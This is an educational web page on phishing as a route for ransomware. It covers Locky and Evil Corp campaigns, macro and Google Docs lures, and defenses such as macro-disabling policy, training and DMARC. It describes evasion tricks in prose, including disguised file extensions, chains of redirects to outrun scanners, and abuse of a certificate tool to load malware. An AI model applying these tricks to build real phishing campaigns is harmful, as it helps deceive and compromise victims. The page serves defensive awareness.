Phishing Attacks

Phishing is a problem that’s bigger than ransomware and will be around long after ransomware is finally eradicated.

A Little Background of Phishing Attacks

Much like the credential marketplaces, phishing is a problem that’s bigger than ransomware and will be around long after ransomware is finally eradicated. Phishing takes its name from “fishing,” which metaphorically refers to throwing out bait and seeing what responds. For instance, much phishing consists of sending email or other messages with links that look interesting or important (“Click here if you think this $499 charge is incorrect”), and that lead to installing malware on the victim’s computer. A variant of phishing called “vishing” refers to voice messages sent to victims’ phones.
Phishing attacks have been around since the mid-1990s* (Footnote 1). Today, approximately 3 billion phishing emails are sent per day* (Footnote 2), accounting for about 1% of all email sent* (Footnote 3).
A mere 1% of all email may not sound like a lot, but it's enough to cause a lot of damage. According to the FBI, business email compromise (BEC), which almost always starts with a phishing or vishing attack, cost organizations more than $12 billion between 2013 and 2018* (Footnote 4). In 2020 alone, BEC accounted for $1.8 billion worth of losses* (Footnote 5), and that’s just one type of cybercriminal activity that uses phishing for its attack vector.
As with other parts of this site, covering every aspect of phishing attacks is beyond the scope of a single section. Instead, this page focuses on the role of phishing in the deployment of ransomware.
definition

Spam or Phishing?

Many people use the terms “spam” and “phishing” interchangeably, but there is a difference that’s important to remember. Spam refers to any unwanted email, whereas phishing emails are malicious. A phishing email may try to convince a victim to click on a link, install malicious software, share a username and password, or enable a host of other malicious activities.

The Long History of 
Phishing and Ransomware

Ransomware and phishing have a long, connected history. One of the ways that GPCode was delivered was through spear phishing campaigns. The attacker scraped job sites for email addresses and sent victims a Trojan disguised as a job application. It was a simple but effective way of targeting victims and spreading ransomware.

Other ransomware actors adopted ...

... phishing as a primary delivery method for the ransomware. By including the ransomware as part of an attachment or directing victims to malicious websites that exploit their browsers or browser plug-ins (such as Adobe Flash), these ransomware groups were able to quickly spread their malware. The lures used in these phishing emails are still commonly used today:
Law enforcement
Official government agency communication
Package delivery
Payment due
Received payment
Legal notices
Understanding common lures is important, especially as they evolve over time. Knowing the types of phishing emails that ransomware (and other cybercriminals) like to send allows security teams to better prepare defenses and employees for a phishing campaign.
Ransomware groups send out millions of these emails a month, so they need to infect only a small percentage of recipients to make a good deal of money.

Locky

Locky ransomware took the pairing of ransomware and phishing to the next level. At one point the group behind the Locky ransomware sent out as many as 23 million phishing emails over a 24-hour period. It wasn’t unusual for individual Locky phishing campaigns to be distributed to over 100 million people. The group behind Locky sent out phishing campaigns at volumes unmatched by any ransomware group before or since.
The above screenshot is an example of a typical Locky phishing campaign. Again, it’s not a very sophisticated attack. The email has the subject “documents” with a request to download them and includes an attached .zip file that contains the ransomware. Compressed files were often used in these phishing campaigns, and in fact are still used today, because compressed files often allow the phishing email to bypass any mail security precautions. Many modern ransomware phishing campaigns use password-protected compressed files.

The group behind Locky did more to...

... avoid detection than simply compress files. They had a complex network set up to distribute their phishing attacks. Analysis of two of their campaigns from September of 2017 revealed that:
The phishing emails that purported to be printer output were sent from a total of nearly 120,000 IP addresses from 139 country code top-level domains, according to Comodo. The other phishing email that was utilized in the September Locky campaign was sent from over 12,350 IP addresses in 142 countries. In total, the IP addresses used in the September attacks were scattered across more than half of all countries in the world.

This type of broad, diverse, and...

... continuously changing infrastructure allowed Locky to bypass not just local mail security protection, but external protections such as block lists and real-time blackhole lists (RBLs).

The type of infrastructure required... 

... to distribute these large-scale phishing campaigns attracts a lot of attention. Locky was distributed primarily using the Necurs botnet, which at its height had 9 million infected machines under its control. The Necurs botnet was increasingly targeted by network infrastructure and was effectively shut down in early 2019, then taken offline permanently by Microsoft and 35 law enforcement agencies around the world in early 2020.
Although the Locky ransomware is no longer active, many of the lessons learned during its run are still used by both ransomware groups and defenders today.
deep dive

Getting To Know Evil Corp

E Corp, also known as Evil Corp, is well known to fans of the television show Mr. Robot, but is also the name of the group behind Locky ransomware and many other cybercriminal activities.

Evil Corp started in 2007 by delivering a banking trojan called Cridex. This eventually morphed into Dridex, a modular trojan that can steal banking information, drop a keylogger, and deploy other types of malware. Dridex isn’t used just by Evil Corp to deploy its own malware; it’s also rented out to other cybercriminals.

Locky isn’t the only ransomware deployed by Evil Corp. After Necurs faded away, Evil Corp released the BitPaymer ransomware, which was one of the first ransomware families to rely on Big Game Hunting techniques. Evil Corp is also presumed to be behind the WastedLocker ransomware and Grief ransomware.

One of the reasons that Evil Corp is behind so many different ransomware campaigns is that Evil Corp is one of the few ransomware groups that’s officially sanctioned by the United States government for the development and delivery of the Dridex malware. This means that U.S.-based organizations who pay them a ransom may be sanctioned by the Office of Foreign Assets Control (OFAC). Switching between different ransomware variants gives victims deniability if they have to pay a ransom.

Ransomware and Phishing Today

Phishing attacks are still an important part of ransomware ...

... even though ransomware groups no longer send millions of phishing emails at a time. Phishing campaigns delivering ransomware generally use the following techniques:
Microsoft Office Documents with macros
Attached JavaScript or other scripting files

Microsoft Office Macros

The type of phishing attack people are most familiar with is the Microsoft Word attachment, as this technique is widely used across multiple groups. These emails are often labeled “Invoice” or “Past Due,” although ransomware groups have adapted to world events using COVID-19 or Olympics themes as lures, among others.

Macros are tiny bits of code that can be embedded in Microsoft Office documents. 

They can serve a lot of useful functions, but malicious actors, especially ransomware groups, often use them to deploy malicious payloads. The screenshot to the right is a pretty basic example of an email sent to a victim. The sole purpose is to get the victim to enable macros within Microsoft Word.
Sample of a Word Document used in a ransomware phishing campaign
Macros make for a great initial payload, sometimes referred to as a loader, because there are a lot of legitimate reasons to use macros they’re almost always allowed by organizations. This means that macros bypass most security protections that may be in place, even some sandboxing applications.
Microsoft has disabled macros by default in all current versions of Microsoft Office, but that doesn’t mean that phishing campaigns using Microsoft Office documents no longer work. Many people, for a variety of reasons, still need macros for their day-to-day work, so disabling macros across an entire organization is often difficult for IT and security teams to implement, hence the “official looking” notice in the above screenshot asking the victim to enable macros. Of course, macros won’t help anyone view a version of a document created by a newer version of Microsoft Word, but most people won’t know that. Many people, upon seeing this type of notice, will assume it’s legitimate, enable macros, and unknowingly launch a ransomware attack.
pay attention

Macros Still Poses a Real Risk to Security

Despite the best efforts of Microsoft and security professionals around the world, Microsoft Office macros still pose a real risk to security. But macros can be universally disabled using Active Directory Group Policy Object (GPO). GPO allows administrators to set a universal security setting across an entire domain. The advantage of using GPO to disable Microsoft Office macros is that it cannot be overridden at the user level, so it allows administrators to protect users from themselves.

The other nice thing about using GPO is that it allows administrators to create separate groups. So, if there are users who need to enable macros, they can be placed in a separate group with permission to open certain macros. This allows them to continue to do their job uninterrupted while keeping the organization safe.

Google Docs

Similar to Office Documents, Google Docs and Google Drive have become an increasingly popular delivery mechanism for phishing emails.
The group behind the Bazar Loader is particularly fond of using Google Docs as lures. Similar to the Microsoft Office-based lures, many of these phishing campaigns involve “Invoice” and “Billing” lures. But, some of the Bazar Loader campaigns can be more personalized, such as telling the victim that they’ve been terminated and asking them to click on a Google Document to find out their severance package.
These campaigns tend to be a little more straightforward. The victim clicks on a legitimate Google Document to find an embedded “PDF” or “Word Document” that needs to be downloaded to view the document. Of course, the link leads not to a PDF or a Word Document but to a malicious executable. The icon for the malicious file is changed often by simply naming the embedded file something like invoice.doc.exe and changing the icon to make the file look like a Microsoft Word file.
As an added trick, attackers often use Google Doc redirects to avoid any proxy or sandbox detections. Most security tools that monitor for redirects have a limited number of redirects that they'll follow before they stop checking the links for malicious content. The idea is that they don’t want unlimited redirects eating up resources, effectively overwhelming the platform. Attackers know this, so they sometimes include dozens of redirects to avoid detection.

General Phishing Techniques

Because phishing attacks are so dynamic ...

... quickly switching from lure to lure, many phishing campaigns are built on templates. This allows the ransomware groups to keep the structure of the email and the technology behind it the same, while swapping out the lures for whatever is the trending news topic of the day.
Not just Microsoft and Google services are abused like this; they’re simply the most prominent. Any productivity offering that’s commonly used by organizations can and will be abused in this way. Ransomware actors have used Dropbox, Slack, GitHub, and other services as part of phishing lures. These services work well for ransomware groups and other phishing attacks because they’re unlikely to be blocked and sometimes are part of allow groups for other security tools, such as web proxies and web application firewalls.

Phishing for Harvesting Purposes

Although the focus of this page is on ransomware delivered via phishing, a lot of these same techniques are used in phishing campaigns designed to harvest credentials. Although these campaigns don’t directly deliver ransomware, the harvested credentials can be used in ransomware attacks later.
Credential harvesting databases have to be sold somewhere, as discussed on the "Credential Markets and Initial Access Brokers" page. More than 70% of all phishing campaigns in 2020 were credential harvesting attacks, and Kaspersky alone identified more than 434 million phishing emails. That means there were potentially hundreds of millions of credentials harvested and placed for sale on underground forums. Cybercriminal groups often engage in multiple types of illegal activity, so it’s possible that credentials taken by one arm of a cybercriminal group won’t be sold, but instead will be used by the branch of the group launching ransomware attacks.
This is why it’s so important to monitor for and stop all phishing campaigns, not just those delivering ransomware.

Want More Like This Delivered Monthly
Directly In Your Inbox?

Sign Up To Receive Our 
Monthly Ransomware Newsletter

Don't Worry, We Hate Spam Too!

The Payload

Ransomware phishing attacks don’t usually deliver ransomware. Instead, they deliver a payload that allows the ransomware attacker to start reconnaissance of the organization.
The initial payload is often a simple PowerShell script that does a quick survey of the first machine and pulls down a loader, such as Trickbot, that the attackers can use to gain hands-on-keyboard access.

Many ransomware affiliates have carried out such attacks dozens of times, and ransomware groups as a whole have done them hundreds or thousands of times, so they possess a lot of collective experience in avoiding detection mechanisms.
Whenever possible, ransomware groups use common system administration tools during this phase to avoid detection. One example is Cerutilt, which is a Microsoft tool used to download, manage, and install certificates. It turns out that Cerutil can also be used to load the Trickbot DLL into memory, usually allowing it to avoid detection by endpoint protection solutions.
Using these types of loaders or droppers and by installing these initial access tools into memory, the ransomware attacker can survey the network, ensure they haven’t inadvertently landed in a honeypot, disable tools that might detect their activity, and download the tools needed for the next phase, which is discussed on the "Honeypots and Honeyfiles" page.

Conducting Proper 
Phishing Training

There is a school of thought ...

... in information security claiming that phishing training doesn’t work. According to the TerraNova 2020 Gone Phishing Tournament Report, even after phishing training, many organizations still had a 20% click-through rate on simulated phishing exercises.
Part of the problem is that many phishing training programs are outdated and static, contrasted with how dynamic and agile the threat actors are when launching phishing campaigns. Some of the challenge originates from the tendency of many organizations to see security awareness training (of which phishing training is usually a part) as a function of compliance rather than security. Organizations that want to be able to check a box, rather than truly educate employees, are going to keep the training as simple and cost-effective as possible.

For phishing training to be effective ...

... it has to properly reflect the real world and current phishing campaigns. Offering suggestions like “look for grammatical mistakes” reflects an outdated knowledge of modern phishing campaigns.
The most effective phishing training takes place multiple times a year and is personalized to the organization’s environment, even ideally to the individual users. (Simulation campaigns can be adjusted based on the reaction of each individual user.) These campaigns should ideally be conducted by an outside vendor with input from the security and compliance teams. To put it bluntly, most organizations don’t have the expertise, staff, or time to run an effective phishing simulation campaign on their own. Better to let experts do it.
pay attention

Reporting Is Key

In addition to regular training, organizations have to make it easier to report suspected phishing emails. Provide a centralized email address or a “click button” where employees who suspect they've received a phishing email can quickly report a suspected phishing campaign. This makes employees feel that they’re part of the security campaign.

The counterpart to a reporting process is to provide IT or security personnel on the other side of that reporting feature who are responsive to those reports, and do so in a timely fashion. A reporting solution doesn’t work well if an employee has to wait three days to hear back or, worse, never receive any response. When an employee reports a phishing email, it’s important to respond quickly, thanking them for their report, and explaining why an email message is or isn’t a phishing message. This allows the employee to understand that they’re an important part of the security process and encourages learning, as well as more reporting.

Don’t Forget the Technical Solution

Phishing training is never enough.

Not even the best phishing training solution claims that it will get click-through rates down to zero. There will always be someone who clicks on a phishing email. Perhaps they’re having a bad day and are in a hurry, or a lure is one that they're particularly susceptible to, or the phishing campaign is simply a really good one. Whatever the reason, no one person or organization is completely immune to phishing attacks.
That’s why phishing training isn’t enough. Organizations have to invest heavily to prevent phishing emails from making it through to employees. This means investing in security tools that stop phishing attacks at the edge. The good news is that improving email security doesn’t always mean investing in new hardware or software solutions. Many organizations already have email security solutions in place, but not every feature has been enabled. Especially if a mail security solution has been in place for several years, it’s a good idea to conduct an audit to see whether there are features not yet enabled that can improve security.

At a minimum, every organization should ...

... enable Domain-based Message Authentication Reporting and Conformance (DMARC). DMARC gives third parties the ability to confirm that emails purported to be from an organization are really from that organization. Almost all phishing emails at this point fail DMARC verification, so organizations can flag email messages that fail DMARC checks to be quarantined and reviewed manually. A word of warning, however: Adoption of DMARC has been slow, so your checks might throw a lot of legitimate messages into quarantine. Adoption of DMARC is picking up, luckily,
Phishing attacks aren’t going away any time soon, so organizations must be vigilant and adapt to these attacks as they continue to evolve.

Learn More. Dominate Ransomware!
Download The Free 313 Page Book:
Ransomware: Understand. Prevent. Recover

Get the Book 
in Your Inbox

Download The 
"Ransomware Backup Strategy"
Cheat Sheet

Grab this free PDF resource on how to prevent Ransomware
DOWNLOAD THE PDF

Share This Resource With Others

Embed The "Ransomware Resistant Backup Strategy" resource on your site or blog using this code.

Share this Infographic On Your Site

Download The 
"How To Prevent Ransomware"
Cheat Sheet

Grab this free PDF resource on how to prevent Ransomware
DOWNLOAD THE PDF

Share This Resource With Others

Embed The "How To Prevent Ransomware" resource on your site or blog using this code.

Share this Infographic On Your Site

Want More?

This site is adapted from a book on Ransomware. 
If you would like to learn more keep reading...
READ MORE ABOUT REMOTE DESKTOP AND MULTIFACTOR AUTHENTICATION
Label
envelope
linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram
Share via
Copy link
Powered by Social Snap